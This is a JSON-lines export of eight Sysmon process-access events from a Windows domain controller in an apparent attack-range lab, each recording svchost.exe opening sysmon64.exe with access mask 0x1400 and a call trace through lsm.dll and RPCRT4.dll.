{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
